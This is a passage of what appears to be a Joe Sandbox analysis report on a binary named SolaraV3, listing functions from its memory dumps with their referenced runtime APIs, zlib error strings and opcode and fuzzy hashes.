memcpy_s.LIBCPMT ref: 00007FF6DC72524C

Strings

1#IND, xrefs: 00007FF6DC7241E7
1#SNAN, xrefs: 00007FF6DC72420A
1#INF, xrefs: 00007FF6DC724223
1#QNAN, xrefs: 00007FF6DC724213

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
Instruction ID: 2769bec3b735b2c68d672406c1a786782c2ab956f1997812304570ab5e0fe993
Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
Instruction Fuzzy Hash: E6B2F372F1828A8BE7758E64D4607FCB7A1FB55388F505136DA0E97A84DF38E912CB40

Function 00007FF6DC70ACAD Relevance: 12.0, Strings: 9, Instructions: 744COMMON

Download Yara Rule

Strings

invalid literal/length code, xrefs: 00007FF6DC70B3E2
too many length or distance symbols, xrefs: 00007FF6DC70AE46
invalid code lengths set, xrefs: 00007FF6DC70AE2D
invalid distances set, xrefs: 00007FF6DC70B1A0
invalid distance code, xrefs: 00007FF6DC70B5B4
invalid literal/lengths set, xrefs: 00007FF6DC70B133
invalid code -- missing end-of-block, xrefs: 00007FF6DC70B0C6
invalid distance too far back, xrefs: 00007FF6DC70B670
invalid bit length repeat, xrefs: 00007FF6DC70B099

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID:
String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
API String ID: 0-2665694366
Opcode ID: 14409f6b5173d9f28888b9fb9c68bcc2b54b8e7def706e6c40ef53002486e1ba
Instruction ID: 10d6defc105358fa8f69cc94e3c0afbadf8f652ce5e537a380f46786f9d1608f
Opcode Fuzzy Hash: 14409f6b5173d9f28888b9fb9c68bcc2b54b8e7def706e6c40ef53002486e1ba
Instruction Fuzzy Hash: 6D520372A146AA8BD7A48F15C458B7E3BB9FB44340F11413AE64AC7780DF3EE951DB40

Function 00007FF6DC70D12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF6DC70D148
RtlCaptureContext.KERNEL32 ref: 00007FF6DC70D175
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6DC70D18F
RtlVirtualUnwind.KERNEL32 ref: 00007FF6DC70D1D0
IsDebuggerPresent.KERNEL32 ref: 00007FF6DC70D224
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6DC70D241
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6DC70D24C

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
Instruction ID: 564a769d78f6f7348ade173c874a946f8c09c260890834bf171ae7ab098c6bab
Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
Instruction Fuzzy Hash: F9313E72608B858AEB708F61E8903EE73B4FB94744F44403ADA4E87B99DF38D559C710

Function 00007FF6DC725C00 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6DC725C45

Part of subcall function 00007FF6DC725598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC7255AC

Part of subcall function 00007FF6DC71A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6DC722D22,?,?,?,00007FF6DC722D5F,?,?,00000000,00007FF6DC723225,?,?,?,00007FF6DC723157), ref: 00007FF6DC71A95E
Part of subcall function 00007FF6DC71A948: GetLastError.KERNEL32(?,?,?,00007FF6DC722D22,?,?,?,00007FF6DC722D5F,?,?,00000000,00007FF6DC723225,?,?,?,00007FF6DC723157), ref: 00007FF6DC71A968

Part of subcall function 00007FF6DC71A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6DC71A8DF,?,?,?,?,?,00007FF6DC71A7CA), ref: 00007FF6DC71A909
Part of subcall function 00007FF6DC71A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6DC71A8DF,?,?,?,?,?,00007FF6DC71A7CA), ref: 00007FF6DC71A92E

_get_daylight.LIBCMT ref: 00007FF6DC725C34

Part of subcall function 00007FF6DC7255F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC72560C

_get_daylight.LIBCMT ref: 00007FF6DC725EAA
_get_daylight.LIBCMT ref: 00007FF6DC725EBB
_get_daylight.LIBCMT ref: 00007FF6DC725ECC
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DC72610C), ref: 00007FF6DC725EF3

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID:
API String ID: 4070488512-0
Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
Instruction ID: 740a22a3d9c5a59e482d2a3243f6d1f5ee3c22f031c12653f13af1f0ca93a048
Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
Instruction Fuzzy Hash: AED1C126E0824A46E770DF26D8A15BDA762FF84798F448137EA0DC7695EF3CE4638740

Function 00007FF6DC71A614 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6DC71A68D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6DC71A6A5
RtlVirtualUnwind.KERNEL32 ref: 00007FF6DC71A6E0
IsDebuggerPresent.KERNEL32 ref: 00007FF6DC71A719
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6DC71A723
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6DC71A72E

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
Instruction ID: 0d71608eff498561538785c27ceb292077e6ce3557bc13c01e4d7a663ebd33b6
Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
Instruction Fuzzy Hash: AA319336A08F858ADB60CF25E8502AE73B4FB88754F544136EA9D83B95DF3CD166CB00

Function 00007FF6DC721874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC7218C0
FindFirstFileExW.KERNEL32 ref: 00007FF6DC7219CA

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
Instruction ID: b1c804c7149906916c15a875c6f53f7623fee7dba1f9656606373445430616db
Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
Instruction Fuzzy Hash: 6DB1F622B1869A42EA719B2695201BDA7A0FB44BE4F545133EE4D87BD5DE3CE863C300

Function 00007FF6DC725E7C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6DC725EAA

Part of subcall function 00007FF6DC7255F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC72560C

_get_daylight.LIBCMT ref: 00007FF6DC725EBB

Part of subcall function 00007FF6DC725598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC7255AC

_get_daylight.LIBCMT ref: 00007FF6DC725ECC

Part of subcall function 00007FF6DC7255C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC7255DC

Part of subcall function 00007FF6DC71A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6DC722D22,?,?,?,00007FF6DC722D5F,?,?,00000000,00007FF6DC723225,?,?,?,00007FF6DC723157), ref: 00007FF6DC71A95E
Part of subcall function 00007FF6DC71A948: GetLastError.KERNEL32(?,?,?,00007FF6DC722D22,?,?,?,00007FF6DC722D5F,?,?,00000000,00007FF6DC723225,?,?,?,00007FF6DC723157), ref: 00007FF6DC71A968

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DC72610C), ref: 00007FF6DC725EF3

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3458911817-0
Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
Instruction ID: 2e999d5bedbcb71b993dd2b8a3e3d47e016d192ce6285883294a4ee3d5cdc706
Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
Instruction Fuzzy Hash: BC519F32A0864A86E770DF26D8A15BDB761FB88798F408137EA4DC7695DF3CE4628740

Function 00007FF6DC70D010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6DC70D03C
GetCurrentThreadId.KERNEL32 ref: 00007FF6DC70D04A
GetCurrentProcessId.KERNEL32 ref: 00007FF6DC70D056
QueryPerformanceCounter.KERNEL32 ref: 00007FF6DC70D066

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
Instruction ID: ce08adde9aabb61b9443b9aac59d83fd0334e1be90b2680114abd763de43213f
Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
Instruction Fuzzy Hash: 40113C22B14F098AEB10CF70E8542BD33A4FB59758F440E36EA6D867A4DF7CD1668340

Function 00007FF6DC723C10 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF6DC723C76
memcpy_s.LIBCPMT ref: 00007FF6DC723CA1

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction ID: 3f7811fcddcccd83817986bd767203a5871a63c02d0c5b1ecae646f1f39e62a3
Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction Fuzzy Hash: 71C1F372B1828A87E734CF1AA05466EF7A5F784B84F408136DB4A87784DF3DE956CB40

Function 00007FF6DC70A47B Relevance: 4.1, Strings: 3, Instructions: 397COMMON

Download Yara Rule

Strings

, xrefs: 00007FF6DC70A55B
header crc mismatch, xrefs: 00007FF6DC70A921
unknown header flags set, xrefs: 00007FF6DC70A4C5

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID:
String ID: $header crc mismatch$unknown header flags set
API String ID: 0-1127688429
Opcode ID: e32b299fc273864699ec3bddfbf8fc958dab4a7742ffdf8f0166f3b43fcc42d1
Instruction ID: a869e4f6a68020f1162b2c4b50732bf32f23ab920789faeb0413274db84f46b6
Opcode Fuzzy Hash: e32b299fc273864699ec3bddfbf8fc958dab4a7742ffdf8f0166f3b43fcc42d1
Instruction Fuzzy Hash: 25F18F72E183C98AE7A58B1AC088A3E3AF9FF44754F25453ADA4987390CF39E552D740

Function 00007FF6DC729728 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF6DC729977
RaiseException.KERNEL32 ref: 00007FF6DC729988

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
Instruction ID: 7e2dc7f4391b138ae2814458dfc3d3971bcae53f213a2a9b3eec097b9e268baf
Opcode Fuzzy Hash: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
Instruction Fuzzy Hash: B5B15077604B898BE725CF29C85636C7BA0F784B58F198926DB9D837A4CF39D462C700

Function 00007FF6DC7139A4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON

Download Yara Rule

Strings

, xrefs: 00007FF6DC713D54
, xrefs: 00007FF6DC713B12

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
Instruction ID: e14807615e1396f355b92266f1cf44fe0719d0e34ff965bcfea908e59680a6e0
Opcode Fuzzy Hash: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
Instruction Fuzzy Hash: 70E1A236A18A4A86EB788F2D816113D37A0FF45B48F146237DA4E877D4DF29E963C740

Function 00007FF6DC70A2DB Relevance: 2.7, Strings: 2, Instructions: 218COMMON

Download Yara Rule

Strings

invalid window size, xrefs: 00007FF6DC70A449
incorrect header check, xrefs: 00007FF6DC70A462

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID:
String ID: incorrect header check$invalid window size
API String ID: 0-900081337
Opcode ID: e8ec78490181e4ccec650f854842bb3e08bcfae3bf2db5596c2af0d8e2ff5899
Instruction ID: 02d1dc57b97909ac7b2531c64917e4e22ff1f956d9cc8076cbeb54c42060c423
Opcode Fuzzy Hash: e8ec78490181e4ccec650f854842bb3e08bcfae3bf2db5596c2af0d8e2ff5899
Instruction Fuzzy Hash: 0891A672E186CA87E7A48E16C448B3E3AB9FF44354F11413ADA4AC67D0CF39E552DB40

Function 00007FF6DC71DEF0 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

gfff, xrefs: 00007FF6DC71E07A
e+000, xrefs: 00007FF6DC71DFFD

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID:
String ID: e+000$gfff
API String ID: 0-3030954782
Opcode ID: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
Instruction ID: eb204df9d710eb7c8d1227d19e5354538dbe873f4180f705456b110325cd4230
Opcode Fuzzy Hash: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
Instruction Fuzzy Hash: B1518922F182C946E7258E39D82476DAB95E744B94F48A232CBAC87AC5CE3DD1128B00

Function 00007FF6DC71DA5C Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF6DC71DD9E

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction ID: c0e51c10ec7364c88d9951f5074d763dd1b8167bb845956d09be783a8cedb5bf
Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction Fuzzy Hash: 0BA14762F087C946EB22CF29A4607AD7791AB65B84F049133DE8D87785DE3DE512CB00

Function 00007FF6DC718794 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

TMP, xrefs: 00007FF6DC7187B3

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: TMP
API String ID: 3215553584-3125297090
Opcode ID: 55bfb0711aaa24fc3f3c49a17a094aed8874a1becd77c64581317e125ecb5b45
Instruction ID: f9aecb91047d20352c4b47d0e8a37beef77d30edee0bb64711cbf310cfbab17a
Opcode Fuzzy Hash: 55bfb0711aaa24fc3f3c49a17a094aed8874a1becd77c64581317e125ecb5b45
Instruction Fuzzy Hash: 2651E211F1860A41FB64AB2F59311BE5690AF44BD4F5A6237DE1EC77D6EE3CE4638200

Function 00007FF6DC723480 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF6DC723484

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
